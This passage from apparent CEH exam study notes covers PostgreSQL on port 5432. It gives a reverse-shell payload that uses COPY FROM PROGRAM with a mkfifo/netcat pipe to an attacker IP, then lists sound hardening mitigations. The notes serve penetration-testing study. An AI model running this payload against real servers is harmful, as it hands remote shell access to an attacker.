YumiKioko/CEH-Practical-Exam/13-On Ports/PostgreSQL_5432.md

 # To get a reverse shell:
 COPY cmd_exec FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your_ip> 4444 >/tmp/f';
 What to do: Use the COPY FROM PROGRAM or \o meta-command to execute system commands and gain a foothold on the underlying server.

-3. Mitigation
-Authentication: Configure pg_hba.conf to use md5 or scram-sha-256 password authentication for all hosts.
-Never use trust for remote hosts (host).

-Passwords: Enforce strong, unique passwords for all users, especially the postgres superuser.

-Network: Use a firewall to restrict access to port 5432 to only application servers that need it.

-Privileges: Follow the principle of least privilege; don't grant superuser rights to application users.